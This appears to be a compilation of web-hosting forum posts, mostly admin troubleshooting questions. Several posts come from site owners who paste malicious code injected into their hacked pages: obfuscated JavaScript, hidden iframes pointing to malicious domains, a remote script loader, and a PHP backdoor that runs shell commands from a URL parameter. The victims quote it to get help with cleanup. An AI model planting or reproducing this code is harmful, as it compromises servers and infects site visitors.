Hacked: How To Find Javascript Added To Pages In /home
Apr 23, 2007
Many of my websites on my server have been hacked; it randomly adds
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->
To some of my pages on my websites in my /home directory.
Please do not visit the links without anti virus protection.
What command can I use to search all of my files in my home directory for this?
Jul 15, 2008
When I opened my site I found that there was code in the index, I don't know from what, but when I erased it, it returned again ...
Jun 25, 2007
About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages across various accounts.
After I removed it all, I noticed that this has happened to me again!
Code:
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->
How are they inserting it into my web pages?
Apr 22, 2009
Looking through my logs I found something that bothers me: there are bots that keep making requests on my website for pages like /admin or /secure to find vulnerabilities.
It's making about 5-6 requests for nonexistent pages every second until it comes to the end of its dictionary (the pages are even sorted in alphabetical order,
Is there some way to let my Apache server block access to these bots when they make X attempts to see a page that does not exist in a short amount of time? A bit like iptables rejecting a connection if someone tries to log in but fails to do so too many times.
Jul 31, 2007
I had what I thought was a fairly smooth install via yum of Pure-FTP on a Fedora 7 SELinux server. I configured it to use its own PureDB virtual user system, and I added a few users using # pure-pw useradd to test things out. However, upon successfully logging in...
[21:51:34] USER test1
[21:51:34] 331 User test1 OK. Password required
[21:51:34] PASS (hidden)
[21:51:34] Cannot login waiting to retry (30s)...
[21:51:34] Server closed connection
...so, I check /var/log/messages to find...
Jul 31 21:50:25 homeserve pure-ftpd: (?@192.168.0.134) [INFO] New connection from 192.168.0.134
Jul 31 21:50:25 homeserve pure-ftpd: (?@192.168.0.134) [ERROR] Home directory not available - aborting
Clearly, something is awry. When I created the users, I explicitly specified their home directory using pure-pw's -d flag, and I can confirm that it was entered correctly by viewing the /etc/pure-ftpd/pureftpd.passwd. The directories, of course, do exist with the proper permissions and ownership.
Jul 10, 2009
My server was hacked; I can find some HTML and PHP files into which the hacker inserted code similar to the following.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
Jun 6, 2009
Hosters: Which 3rd party addon script do you find getting hacked the most?
Sep 8, 2007
My site was hacked today; all pages named index.html were hacked. It is some kind of script, since all pages were written at the same time.
I'm using a very respectable hosting. I jumped from another hosting where I was exposed on an unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
- I found an index.txt file with links to obscure sites.
The code was written at the bottom of all the index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recovered the files from backup, secured the config.php files and modified %index% to read-only...finally changed the password...
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
Feb 1, 2008
I am moving to a new server. At first the [url] version of the site was fine. I had trouble getting [url] working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url] pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....
Mar 18, 2009
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites as well as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
Jan 24, 2008
I've tried turning on/off gzipping, other stuff.
It's an AJAX tab script.
Exact same thing, exact same paths work on my shared hosting elsewhere, but not on my box running LS.
Mar 14, 2007
A tech admin that I worked with previously fixed an issue we were having. He explained what he did:
To fix you need to make apache be able to parse JS
He is no longer available.
How do I do this? Which file (I expect httpd.conf) would I need to edit and what part of it would it be?
May 28, 2007
Does anyone know of any free web hosts that would allow me to use PHP and JavaScript in my web-pages?
Nov 20, 2008
I pasted the contents of a javascript page into a filename on my server.
Now I can't rename, download or delete the file,
May 15, 2007
I had csf firewall installed, and due to my own stupidity, attempted to login with the wrong password one too many times, which added my IP to iptables, locking me out. I had to SSH into a linux box at school, and then ssh into my server to stop the iptables service so I could get into my server.
I removed every trace of my IP that I could find in csf, but sometime in the middle of the night, iptables reloads some rules from somewhere that blocks me again. I also tried doing iptables -F to clear all rules, but again, sometime in the middle of the night, rules are reloaded and I get blocked. I even uninstalled csf to no avail. I just want to remove my IP once and for all.
Jul 2, 2008
I just got a 2nd server.
I had a problem at the beginning, so I had to reload,
so I think the tech forgot to add my other IPs to my network card configs.
I remember layeredtech once reloaded my server and the same problem happened, so they advised me to add it to a config file in my server.
Apr 11, 2009
I'm trying to embed the LiveZilla chat icon within a flash header and haven't been able to do it for the life of me.
Oct 23, 2013
have a website that sources a number of jquery plugins, when I load the site in chrome or firefox the javascript console is saying that these files were not loaded.
The server is a localhost and the files are local.
The google jquery file loads fine.
how I need to configure the apache config file to deal with javascript.
Jul 17, 2015
When I try to go to horde after my upgrade from plesk 11.5.30 to plesk 12.0.18, my horde is loading as minimal because of this:
JavaScript is either disabled or not available on your browser. You are restricted to the minimal view.
But my javascript is enabled for this site.
May 31, 2008
When I add a new site via New Account in WHM and once the domain resolves, the cPanel 'Great Success' page shows. I have verified the site is resolving properly.
This is a brand new installation and the only change I have made is that I updated apache via WHM.
Apr 23, 2008
My fedora server is running apf firewall. When I turn it off, clients can connect.
When I turn it on, it says MSG: Contacting Server.
I have already added ports 6100 and 3784 to /etc/apf/conf.apf by adding the ports to the lines, EG_TCP_CPORTS, EG_UDP_CPORTS, IG_TCP_CPORTS, and IG_UDP_CPORTS
and restarted the service.
Are there any additional ports I need to add?
(I've uploaded my conf.apf file)
Jul 9, 2008
I've been having an issue with one of my sites where someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server and have already upgraded MySQL to the latest version as I thought that might work, but it hasn't.
Feb 21, 2008
I find that at a certain time,
the MySQL of the server will run a lot of queries,
and the IO and load will become very high;
after that time point,
all the IO and load will be smooth.
So, I wonder if any cron job has been added (by a certain account) to run something,
Oct 15, 2007
How can I do a search (probs using regex) for all files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
Oct 24, 2014
I just added a new PHP Handler with PHP Version 5.5.18 as cgi and I always get an error when activating. I used the same settings and php.ini as the built-in ones.
root@ip1:/usr/local/src/php-5.5.18# /usr/local/psa/bin/php_handler --list
id: display name: full version: version: type: cgi-bin: php-cli: php.ini: custom:
5.5.18 5.5.18 5.5.18 5.5 cgi /usr/local/php550-cgi/bin/php-cgi /etc/php5/cli/php.ini true
cgi 5.3.29 5.3.29 5.3 cgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
fastcgi 5.3.29 5.3.29 5.3 fastcgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
module 5.3.29 5.3.29 5.3 module /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
When I want to activate it I get
Fehler: phpinimng failed: Cannot parse php.ini: (<class 'php_ini.PhpIniSyntaxError'>, PhpIniSyntaxError('[<stdin>:24] Invalid configuration line. Are there excessive leading spaces?',))
I get this even if I want to activate a built-in one.
In my additional php config i have
mail.log = /var/log/phpmail.log
mail.add_x_header = On
date.timezone = "Europe/Berlin"
[Zend]
zend_extension=/usr/lib/php/modules/ioncube_loader_lin_5.3.so
zend_extension=/usr/lib/php5/ZendGuardLoader.so
sendmail_path = /usr/sbin/sendmail-wrapper-php
I am using Debian Squeeze.
Apr 21, 2015
I tried to set up a site with a "dedicated" IP without SSL, and ran into this problem again. The new IPs (v4 or v6) are not reachable, pingable, or trace routable from outside the container, even from its PCS hardware node. This is what I get after adding the address in PPA:
Code:
# cat ifcfg-eth0
DEVICE="eth0"
ONBOOT="yes"
BOOTPROTO=static
[code]....
By contrast, if I add an IP address through PVA, it is pingable. Note the differences, namely that PVA's ifcfg-eth0:0 has "BOOTPROTO=static" and the IPs double quoted. For those testing at home also note that PVA removed the existing IPv6 addresses (that it didn't know about).
Code:
# cat ifcfg-eth0
DEVICE="eth0"
ONBOOT="yes"
BOOTPROTO="static"
GATEWAY="x.x.194.1"
IPV6_DEFAULTGW="aaaa:bbbb:0:4c::1"
[code]....
Could that make a difference? Why can't I seem to get secondary IPs to work?